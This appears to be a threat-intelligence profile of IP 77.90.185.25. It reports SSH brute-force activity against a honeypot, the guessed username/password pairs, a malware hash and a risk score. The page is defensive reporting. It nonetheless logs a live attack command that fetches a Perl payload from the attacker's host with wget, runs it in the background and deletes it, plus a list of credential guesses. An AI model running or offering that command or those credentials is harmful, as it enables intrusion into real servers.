TROYANOSYVIRUS
Active ThreatMEDIUM

77.90.185.25

Country of Origin🇮🇷 Iran
First Detection4/28/2026
Last Activity4/28/2026
ISPLimited Network LTD
🎯
107
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
1
Malware

Geolocation

Country
🇮🇷 Iran
City
Unknown
ASN
AS213790
ISP
Limited Network LTD

Attack Types

ssh_telnet_honeypot

Attacked Ports

22

Associated Malware

e276dfeb8f6e48937c67...

Attempted Credentials

🔐minoxidil4you/12345678
3x
🔐minoxidil4you/Minoxidil4you123@
3x
🔐minoxidil4you/minoxidil4you@2025
3x
🔐minoxidil4you/2020*Minoxidil4you
2x
🔐minoxidil4you/ADMIN2026
2x
🔐minoxidil4you/P@ssw0rd2026
2x

Executed Commands

$cd /tmp && nohup sh -c 'wget -q -O /tmp/mot http://77.90.185.25/mot && mv /tmp/mot /tmp/mot.pl && perl /tmp/mot.pl && rm -f /tmp/mot.pl' >/tmp/remote_mot.log 2>&1 &2x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
22
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:9.6p1

Risk Assessment

45
/100
LowMediumHighCritical